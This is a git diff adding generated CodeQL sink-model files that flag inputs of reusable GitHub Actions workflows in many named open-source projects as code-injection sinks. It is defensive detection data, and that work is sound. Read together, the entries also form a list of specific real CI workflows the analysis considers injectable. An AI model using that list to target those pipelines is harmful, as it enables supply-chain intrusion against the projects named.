b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "inputs.next-version", "code-injection", "generated"] + - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "inputs.release-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml new file mode 100644 index 00000000000..9f30976bbad --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "inputs.VERSION_NAME", "code-injection", "generated"] + - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "inputs.REGISTRY", "code-injection", "generated"] + - ["kumahq/kuma/.github/workflows/_test.yaml", "*", "inputs.FULL_MATRIX", "code-injection", "generated"] + - ["kumahq/kuma/.github/workflows/_e2e.yaml", "*", "inputs.matrix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml new file mode 100644 index 00000000000..81a419fec0d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["labring/sealos/.github/workflows/services.yml", "*", "inputs.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/services.yml", "*", "inputs.push_image", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "inputs.build_from", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "inputs.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "inputs.push_image", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/import-patch-image.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/frontend.yml", "*", "inputs.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/frontend.yml", "*", "inputs.push_image", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/controllers.yml", "*", "inputs.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/controllers.yml", "*", "inputs.push_image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml new file mode 100644 index 00000000000..35fd748afbe --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["laion-ai/open-assistant/.github/workflows/docker-build.yaml", "*", "inputs.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml new file mode 100644 index 00000000000..192b1b60843 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "inputs.release_id", "code-injection", "generated"] + - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "inputs.filename", "code-injection", "generated"] + - ["learningequality/kolibri/.github/workflows/pypi_upload.yml", "*", "inputs.tar-file-name", "code-injection", "generated"] + - ["learningequality/kolibri/.github/workflows/pypi_upload.yml", "*", "inputs.whl-file-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml new file mode 100644 index 00000000000..5a397f743a3 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lensesio/stream-reactor/.github/workflows/build.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml new file mode 100644 index 00000000000..97f40ee7c07 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "inputs.directory", "code-injection", "generated"] + - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "inputs.cargo_make_task", "code-injection", "generated"] + - ["leptos-rs/leptos/.github/workflows/get-changed-examples-matrix.yml", "*", "inputs.example_changed", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml new file mode 100644 index 00000000000..293939322e2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "inputs.push_to_s3", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "inputs.pl_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml new file mode 100644 index 00000000000..c3aa198743d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["liquibase/liquibase/.github/workflows/build-azure-uber-jar.yml", "*", "inputs.liquibase-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml new file mode 100644 index 00000000000..1ea78b01cd6 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["litestar-org/litestar/.github/workflows/test.yml", "*", "inputs.python-version", "code-injection", "generated"] + - ["litestar-org/litestar/.github/workflows/notify-released-issues.yml", "*", "inputs.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml new file mode 100644 index 00000000000..23bd3adc5a4 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.package_name_prefix", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.install", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.llvm_force_enable_stats", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.llvm_enable_assertions", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.build_shared_libs", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.cmake_build_type", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.cmake_cxx_compiler", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.cmake_c_compiler", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml new file mode 100644 index 00000000000..77c7570ec0e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lnbits/lnbits/.github/workflows/make.yml", "*", "inputs.make", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml new file mode 100644 index 00000000000..46cc5092355 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lutris/lutris/.github/workflows/publish-ppa.yml", "*", "inputs.PPA_URI", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml new file mode 100644 index 00000000000..78a5584d04b --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "inputs.pinned_mailu_version", "code-injection", "generated"] + - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "inputs.mailu_version", "code-injection", "generated"] + - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "inputs.docker_org", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml new file mode 100644 index 00000000000..1c3e5b565be --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mamba-org/mamba/.github/workflows/windows_impl.yml", "*", "inputs.build_type", "code-injection", "generated"] + - ["mamba-org/mamba/.github/workflows/unix_impl.yml", "*", "inputs.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml new file mode 100644 index 00000000000..7e8d8061fc5 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "inputs.CTEST_END", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "inputs.CTEST_START", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/test_template.yml", "*", "inputs.xml_command", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/test_template.yml", "*", "inputs.artifact_name", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.cmake_command", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.artifact_name", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.CTEST_CONFIGURATION_TYPE", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.DISTR", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml new file mode 100644 index 00000000000..21e3fdb8874 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["marcelotduarte/cx_freeze/.github/workflows/build-wheel.yml", "*", "inputs.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml new file mode 100644 index 00000000000..67e49a5716c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "inputs.mdix-mahapps-version", "code-injection", "generated"] + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "inputs.mdix-colors-version", "code-injection", "generated"] + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "inputs.mdix-version", "code-injection", "generated"] + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "inputs.build-configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml new file mode 100644 index 00000000000..2f30003359c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["matter-labs/zksync-era/.github/workflows/ci-core-reusable.yml", "*", "inputs.compilers", "code-injection", "generated"] + - ["matter-labs/zksync-era/.github/workflows/build-prover-template.yml", "*", "inputs.image_tag_suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml new file mode 100644 index 00000000000..ed9091f37ae --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mattermost/desktop/.github/workflows/e2e-functional-template.yml", "*", "inputs.nightly", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml new file mode 100644 index 00000000000..d940c6a98b0 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "inputs.name", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "inputs.drivername", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "inputs.datasource", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/mmctl-test-template.yml", "*", "inputs.datasource", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/esrupgrade-common.yml", "*", "inputs.db-dump-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml new file mode 100644 index 00000000000..57b56667fbe --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mealie-recipes/mealie/.github/workflows/partial-builder.yml", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml new file mode 100644 index 00000000000..4ffee539cd4 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.adapter_version", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.sm_version", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.expected_resources_namespaces", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.expected_resources_types", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.expected_resources", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.adapter_name", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.patternfile_name", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.service_url", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.deployment_url", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.provider", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adapters.yaml", "*", "inputs.adapter_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml new file mode 100644 index 00000000000..bfe525b2c0e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["meshtastic/firmware/.github/workflows/build_rpi2040.yml", "*", "inputs.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_nrf52.yml", "*", "inputs.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_esp32_s3.yml", "*", "inputs.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_esp32_c3.yml", "*", "inputs.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_esp32.yml", "*", "inputs.board", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml new file mode 100644 index 00000000000..647bd0ae193 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microcks/microcks/.github/workflows/package-native.yml", "*", "inputs.image-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml new file mode 100644 index 00000000000..b09fcb7f102 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/applicationinsights-java/.github/workflows/reusable-scheduled-job-notification.yml", "*", "inputs.success", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml new file mode 100644 index 00000000000..f83101f511c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/chat-copilot/.github/workflows/copilot-run-integration-tests.yml", "*", "inputs.BACKEND_HOST", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-plugins.yml", "*", "inputs.DEPLOYMENT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-plugins.yml", "*", "inputs.ARTIFACT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-memorypipeline.yml", "*", "inputs.DEPLOYMENT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-backend.yml", "*", "inputs.DEPLOYMENT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-backend.yml", "*", "inputs.ARTIFACT_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml new file mode 100644 index 00000000000..7a60c93516d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml @@ -0,0 +1,18 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "inputs.tls", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "inputs.config", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.sanitize", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.plat", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.static", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.tls", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.config", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "inputs.sanitize", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "inputs.codecheck", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "inputs.systemcrypto", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "inputs.plat", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml new file mode 100644 index 00000000000..14d7e741dac --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/oryx/.github/workflows/automationTemplate.yaml", "*", "inputs.platformName", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml new file mode 100644 index 00000000000..bb0e3a6a2b6 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/pr-metrics/.github/workflows/release-phase-1-internal.yml", "*", "inputs.patch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml new file mode 100644 index 00000000000..aa8f4e6b518 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.extraRunWindowsArgs", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.platform", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.extraInitWindowsArgs", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.reactNativeWindowsVersion", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.sampleName", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "inputs.extraRunWindowsArgs", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "inputs.platform", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "inputs.sampleName", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml new file mode 100644 index 00000000000..c9af1a40ddc --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/vscode-cpptools/.github/workflows/job-compile-and-test.yml", "*", "inputs.yarn-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml new file mode 100644 index 00000000000..863bc645d98 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.env", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.includes", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.tags", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.kinds", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.pkgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml new file mode 100644 index 00000000000..6e898a4e452 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["moby/moby/.github/workflows/.windows.yml", "*", "inputs.storage", "code-injection", "generated"] + - ["moby/moby/.github/workflows/.windows.yml", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml new file mode 100644 index 00000000000..a08a96a897e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.context", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.tags", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.image-name", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.image-uuid", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.staging-repo", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.staging", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml new file mode 100644 index 00000000000..f7aafb13455 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - 